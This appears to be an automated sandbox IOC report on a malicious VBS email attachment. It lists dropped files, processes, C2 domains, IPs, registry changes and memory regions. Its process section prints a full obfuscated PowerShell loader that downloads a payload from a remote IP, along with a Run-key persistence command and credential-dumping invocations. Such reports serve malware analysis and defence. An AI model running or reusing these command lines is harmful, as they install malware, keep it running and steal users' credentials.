IOC Report
BRUFEN ORDER VAC442_7467247728478134247.vbs

loading gif

Files

File Path
Type
Category
Malicious
BRUFEN ORDER VAC442_7467247728478134247.vbs
ASCII text, with very long lines (338), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\mvourhjs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2qb3ozf.sqi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqyal4ir.ldu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syyrbntd.tkc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0jujrnj.qzt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv4356.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x2ee53106, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Guanamine9.jud
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)
ASCII text, with CRLF line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BRUFEN ORDER VAC442_7467247728478134247.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSki.nSmkkepurgrCardnFacoeBe.s)Euro ';$Brudekjolernes=$Disintegreret[1]+$Brudekjolernes;$Fletoperationerne=$Disintegreret[0];Landlers (Forkber 'Test$UnmogStnkl UnboPolibUncaaLatrlxylo:,ccuWBloch.ilbeS larUn,aeFleroFa,ln Tre=Glob(semiTdekaeGy esC nttAuko-T.knPD ciaKo,ttU,woh Bet Clam$CretFBevglSinaeOmhatanveo Amap GaseDisrrScapaProdt NoniR gooHiden TileTe,krBorgn EnseVisc),odd ');while (!$Whereon) {Landlers (Forkber 'Olig$ Flbg Dill .oloSvrtbSe.baBefalUnco:Ho sSSpl,kForuu Pe nRi akRusseSeler EronMeche ,nc= Ble$HjtitTinkrVaskuFrigeEdel ') ;Landlers $Brudekjolernes;Landlers (Forkber 'AzotS GyntQuo.aBullrIriatRave-SkibSLilll.apieOp.re frupSkol Di.p4 Svu ');Landlers (Forkber 'Olon$PolygligelB.ndo BaibSplaaQi,alInfo:TibeWNae.h EpieSe,irVulge RepoKonon For=.ipf(GeruT Dise v,tsSpartP.lt- T lP N iaOatetN nchEssa Del,$BaadFVa ulkor,eDometSuqro nopAdvoe CharBrndaRandtExtii He o.nkanSmaaeSymprCaminTilbe Alm) Ham ') ;Landlers (Forkber '.elt$ForkgFutilSto oR.chbGrafaSelvlCert:.idfGnotapForeaPurpk,lekkFyldeToplrKondi Her=Ove,$d sog Nonl FreoAnhnbPseua.yknlAn,i:MagiTZippiSvejlSchism craJelltGenss PukegarargulpsThru9Son +Pr d+.all%Tra.$UnprP HjelSygeaantesCivitCeriiUnsacRekvkAriloGanor llut .tje ScatEtte7Meas.UdpacTiltoMikku hvdnIonitMusi ') ;$Beskftigelsesterapiers=$Plastickortet7[$Gpakkeri];}Landlers (Forkber 'Brtt$Trisg kralpreco Em bH nda .anlSmed:St rShverpcockaUsikr Affk Un e ,nad Im r CemaMaalgAequtUsmaeLandr Ops Glgg=Tril .dpeGLethe ,aptSoci-GrdeCD,kuoRip n .pet Ep.eCathnDysft Hav nos$BlanFLetll .iae Po tPublo S.ipFl.le .anr GehaDolptAnsti timo PytnCarle MarrAfron.vane.esp ');Landlers (Forkber ' Ink$Strkg eallIncroEssabGramastadlElae:SpatLdictiTrirzRetiaDemorS,etd BagfGoodif,nksUnhohA ti Gge =Rece La.t[E keS atayPrersCreptWosieInd mTouc. elsCForuo .honLandvin,eeSkrmrByertLose] E,h:bedu:Ove FI.nerFra,oKendm,orsBRaadaUns.sBreae am6Fle.4BuhrSMurktRecorOptniOp,an Idyg Hir(Adju$ UnfSFau.p ,psaNoner.riskvau,eItemdMaterSa.kaNonhgAbcet U.deSo erD,da) Enk ');Landlers (Forkber 'K.ip$,ifagFililMezqoP.eub ForaInsol Mis:cou.UUpfln lasd ForePro.rUnl.kImaguBl.ceMaskd W iePerisV rd Pyos=Olie Rh,n[Bol.SWinrymucis.ucctLedeeHonomFene.ErhvTF,rdeU tuxZ omtAur .BeseEquadnVergcLittoLabydBr.ii Ha.nDextgChim]P ci:R.nd:RentA Hv.S BorC RenI Kn.Isy.v. ascGTeraeUdpltHercSAme tKortrAvisi ebinDis.g,lai(Ma a$enetLByrdi FilzLiljaNaborF.ordMedifOutciUns,sSkaahStv,)Pros ');Landlers (Forkber 'Unco$me.ig metl,lloocas bEkstatankl App:SvejTAbetzsmrru Sitt S.ruTrilh EsciFiskl,omp=Slid$FortUopdknDyspdNonre N.drNoc.k Ly uNon,eLibed aeneFrkksHomo.ImposRemouSu.nbShirsMacrtSeamrBrugiCobanKonsgLill(Flen2S rk9Sels2Soci4,eso6Bask1 Fo ,Semi2Subr8Pant0Over6Spi.2trag) Ph, ');Landlers $Tzutuhil;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSki.nSmkkepurgrCardnFacoeBe.s)Euro ';$Brudekjolernes=$Disintegreret[1]+$Brudekjolernes;$Fletoperationerne=$Disintegreret[0];Landlers (Forkber 'Test$UnmogStnkl UnboPolibUncaaLatrlxylo:,ccuWBloch.ilbeS larUn,aeFleroFa,ln Tre=Glob(semiTdekaeGy esC nttAuko-T.knPD ciaKo,ttU,woh Bet Clam$CretFBevglSinaeOmhatanveo Amap GaseDisrrScapaProdt NoniR gooHiden TileTe,krBorgn EnseVisc),odd ');while (!$Whereon) {Landlers (Forkber 'Olig$ Flbg Dill .oloSvrtbSe.baBefalUnco:Ho sSSpl,kForuu Pe nRi akRusseSeler EronMeche ,nc= Ble$HjtitTinkrVaskuFrigeEdel ') ;Landlers $Brudekjolernes;Landlers (Forkber 'AzotS GyntQuo.aBullrIriatRave-SkibSLilll.apieOp.re frupSkol Di.p4 Svu ');Landlers (Forkber 'Olon$PolygligelB.ndo BaibSplaaQi,alInfo:TibeWNae.h EpieSe,irVulge RepoKonon For=.ipf(GeruT Dise v,tsSpartP.lt- T lP N iaOatetN nchEssa Del,$BaadFVa ulkor,eDometSuqro nopAdvoe CharBrndaRandtExtii He o.nkanSmaaeSymprCaminTilbe Alm) Ham ') ;Landlers (Forkber '.elt$ForkgFutilSto oR.chbGrafaSelvlCert:.idfGnotapForeaPurpk,lekkFyldeToplrKondi Her=Ove,$d sog Nonl FreoAnhnbPseua.yknlAn,i:MagiTZippiSvejlSchism craJelltGenss PukegarargulpsThru9Son +Pr d+.all%Tra.$UnprP HjelSygeaantesCivitCeriiUnsacRekvkAriloGanor llut .tje ScatEtte7Meas.UdpacTiltoMikku hvdnIonitMusi ') ;$Beskftigelsesterapiers=$Plastickortet7[$Gpakkeri];}Landlers (Forkber 'Brtt$Trisg kralpreco Em bH nda .anlSmed:St rShverpcockaUsikr Affk Un e ,nad Im r CemaMaalgAequtUsmaeLandr Ops Glgg=Tril .dpeGLethe ,aptSoci-GrdeCD,kuoRip n .pet Ep.eCathnDysft Hav nos$BlanFLetll .iae Po tPublo S.ipFl.le .anr GehaDolptAnsti timo PytnCarle MarrAfron.vane.esp ');Landlers (Forkber ' Ink$Strkg eallIncroEssabGramastadlElae:SpatLdictiTrirzRetiaDemorS,etd BagfGoodif,nksUnhohA ti Gge =Rece La.t[E keS atayPrersCreptWosieInd mTouc. elsCForuo .honLandvin,eeSkrmrByertLose] E,h:bedu:Ove FI.nerFra,oKendm,orsBRaadaUns.sBreae am6Fle.4BuhrSMurktRecorOptniOp,an Idyg Hir(Adju$ UnfSFau.p ,psaNoner.riskvau,eItemdMaterSa.kaNonhgAbcet U.deSo erD,da) Enk ');Landlers (Forkber 'K.ip$,ifagFililMezqoP.eub ForaInsol Mis:cou.UUpfln lasd ForePro.rUnl.kImaguBl.ceMaskd W iePerisV rd Pyos=Olie Rh,n[Bol.SWinrymucis.ucctLedeeHonomFene.ErhvTF,rdeU tuxZ omtAur .BeseEquadnVergcLittoLabydBr.ii Ha.nDextgChim]P ci:R.nd:RentA Hv.S BorC RenI Kn.Isy.v. ascGTeraeUdpltHercSAme tKortrAvisi ebinDis.g,lai(Ma a$enetLByrdi FilzLiljaNaborF.ordMedifOutciUns,sSkaahStv,)Pros ');Landlers (Forkber 'Unco$me.ig metl,lloocas bEkstatankl App:SvejTAbetzsmrru Sitt S.ruTrilh EsciFiskl,omp=Slid$FortUopdknDyspdNonre N.drNoc.k Ly uNon,eLibed aeneFrkksHomo.ImposRemouSu.nbShirsMacrtSeamrBrugiCobanKonsgLill(Flen2S rk9Sels2Soci4,eso6Bask1 Fo ,Semi2Subr8Pant0Over6Spi.2trag) Ph, ');Landlers $Tzutuhil;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\otdfknajrvlikyvb"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\znrylxtlfddvmfrffvw"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)"
C:\Windows\System32\wbem\WMIADAP.exe
wmiadap.exe /F /T /R
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
jgbours284hawara01.duckdns.org
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
http://geoplugin.net/json.gpc
unknown
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://geoplugin.net/json.gpg
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://geoplugin.net/json.gpFa)D
unknown
https://go.micro
unknown
http://87.121.105.163/Hylasmus.ocx
87.121.105.163
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPermsEviduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
unknown
https://contoso.com/License
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://geoplugin.net/json.gp3a
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin8
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gpg:3
unknown
http://87.121.105.163/Hylasmus.ocxXRxlD
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
https://aka.ms/pscore68
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binU
unknown
http://87.121.H
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
87.121.105.163
http://www.ebuddy.com
unknown
There are 25 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jgbours284hawara01.duckdns.org
45.88.90.110
malicious
jgbours284hawara02.duckdns.org
unknown
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
45.88.90.110
jgbours284hawara01.duckdns.org
Bulgaria
malicious
87.121.105.163
unknown
Bulgaria
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Martyrmines
Pamphletical
HKEY_CURRENT_USER\Environment
Balancegang
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
exepath
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
licence
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Subtruncated
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7072000
heap
page read and write
malicious
B076000
direct allocation
page execute and read and write
malicious
5B05000
trusted library allocation
page read and write
malicious
8830000
direct allocation
page execute and read and write
malicious
1FD54C70000
trusted library allocation
page read and write
malicious
2F45000
trusted library allocation
page execute and read and write
1FD5CFFD000
heap
page read and write
97CF5FF000
stack
page read and write
4A0D000
heap
page read and write
5A40A3E000
stack
page read and write
231C0000
heap
page read and write
4A11000
heap
page read and write
70AE000
heap
page read and write
1F642CF2000
heap
page read and write
2B54000
heap
page read and write
1FD5CF51000
heap
page read and write
347E000
stack
page read and write
2ECE000
stack
page read and write
6E80000
direct allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
8290000
trusted library allocation
page execute and read and write
1FD45F1C000
trusted library allocation
page read and write
8515000
trusted library allocation
page read and write
CF1000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
2F00000
heap
page read and write
2E84000
heap
page read and write
4AB6000
trusted library allocation
page read and write
303B000
trusted library allocation
page read and write
6EB0000
heap
page read and write
73A8000
heap
page read and write
507B000
heap
page read and write
229F0000
direct allocation
page read and write
8810000
trusted library allocation
page read and write
233C1000
heap
page read and write
2E84000
heap
page read and write
500C000
heap
page read and write
1F640DBD000
heap
page read and write
1FD5D27F000
heap
page read and write
23499000
heap
page read and write
1F6429E7000
heap
page read and write
27CD000
stack
page read and write
4A0D000
heap
page read and write
5200000
trusted library allocation
page read and write
33B0000
heap
page readonly
C90000
heap
page read and write
23129000
heap
page read and write
7FFD9B952000
trusted library allocation
page read and write
4A0D000
heap
page read and write
1FD42FDF000
heap
page read and write
2AEC000
stack
page read and write
7FFD9B78B000
trusted library allocation
page read and write
2F78000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
2AE7000
stack
page read and write
6E2D000
stack
page read and write
1FD44940000
heap
page read and write
1F640DA6000
heap
page read and write
2670000
heap
page read and write
1FD5D28A000
heap
page read and write
2B54000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
82F0000
heap
page read and write
1F642D1C000
heap
page read and write
1F640D19000
heap
page read and write
1F642CD2000
heap
page read and write
1FD43130000
heap
page read and write
316F000
stack
page read and write
1F640C4B000
heap
page read and write
7310000
heap
page read and write
1FD449C0000
trusted library allocation
page read and write
2312A000
heap
page read and write
DD0000
trusted library allocation
page read and write
1F640D1E000
heap
page read and write
2F70000
heap
page read and write
1FD44AB0000
heap
page execute and read and write
1F6429BE000
heap
page read and write
1F640C40000
heap
page read and write
7250000
direct allocation
page read and write
3137000
heap
page read and write
23439000
heap
page read and write
87FC000
stack
page read and write
4A11000
heap
page read and write
4A23000
heap
page read and write
1FD43150000
heap
page read and write
1F640DAF000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
2870000
heap
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
7FFD9B92A000
trusted library allocation
page read and write
2E30000
heap
page read and write
82F8000
heap
page read and write
48EE000
stack
page read and write
6E70000
direct allocation
page read and write
1FD43185000
heap
page read and write
1F642CF2000
heap
page read and write
49C2000
trusted library allocation
page read and write
97CF9FE000
stack
page read and write
70AE000
heap
page read and write
263E000
stack
page read and write
1F640CE8000
heap
page read and write
3038000
trusted library allocation
page read and write
507B000
heap
page read and write
2B55000
heap
page read and write
2B55000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
22C5F000
stack
page read and write
B30000
heap
page read and write
27AC000
heap
page read and write
4A11000
heap
page read and write
1F642660000
heap
page read and write
2E84000
heap
page read and write
500D000
heap
page read and write
4A0D000
heap
page read and write
48AE000
stack
page read and write
2B54000
heap
page read and write
4A26000
heap
page read and write
2BDE000
stack
page read and write
2E84000
heap
page read and write
17046560000
heap
page read and write
4A18000
heap
page read and write
4E20000
heap
page read and write
1FD42F9F000
heap
page read and write
41B000
system
page execute and read and write
2F70000
heap
page read and write
2F40000
trusted library allocation
page read and write
716E000
stack
page read and write
507B000
heap
page read and write
2B55000
heap
page read and write
507B000
heap
page read and write
1FD5CF40000
heap
page read and write
501B000
heap
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1FD5D123000
heap
page read and write
831F000
heap
page read and write
1FD44C01000
trusted library allocation
page read and write
76AE000
stack
page read and write
59C8000
trusted library allocation
page read and write
7088000
heap
page read and write
3490000
heap
page read and write
4950000
heap
page execute and read and write
2C5C000
stack
page read and write
1F640C48000
heap
page read and write
7790000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
507B000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
2FA0000
heap
page read and write
2B54000
heap
page read and write
2B80000
heap
page read and write
32D0000
heap
page read and write
5A4067E000
stack
page read and write
2E84000
heap
page read and write
2C9A000
stack
page read and write
6ED0000
direct allocation
page read and write
503E000
heap
page read and write
71F0000
heap
page read and write
2B54000
heap
page read and write
2E84000
heap
page read and write
5A4057E000
stack
page read and write
1FD4688E000
trusted library allocation
page read and write
5009000
heap
page read and write
2F10000
trusted library allocation
page read and write
226F0000
heap
page read and write
2F0C000
heap
page read and write
5016000
trusted library allocation
page read and write
4A0A000
heap
page read and write
8890000
direct allocation
page read and write
505D000
heap
page read and write
2E50000
heap
page read and write
71AE000
stack
page read and write
7750000
trusted library allocation
page read and write
7300000
heap
page read and write
22FFB000
unclassified section
page execute and read and write
9276000
direct allocation
page execute and read and write
302E000
stack
page read and write
2B54000
heap
page read and write
228EE000
stack
page read and write
5A4168B000
stack
page read and write
5000000
heap
page read and write
2E84000
heap
page read and write
72A0000
direct allocation
page read and write
70C8000
heap
page read and write
2A3E000
stack
page read and write
1F640CF5000
heap
page read and write
4EF0000
heap
page read and write
72B0000
direct allocation
page read and write
1F640C49000
heap
page read and write
4A08000
heap
page read and write
170466A0000
heap
page read and write
1F642CDF000
heap
page read and write
1F642D00000
heap
page read and write
233C0000
heap
page read and write
1F640D8B000
heap
page read and write
23833000
unclassified section
page execute and read and write
1F640D89000
heap
page read and write
500A000
heap
page read and write
7390000
heap
page read and write
70D2000
heap
page read and write
5A4037E000
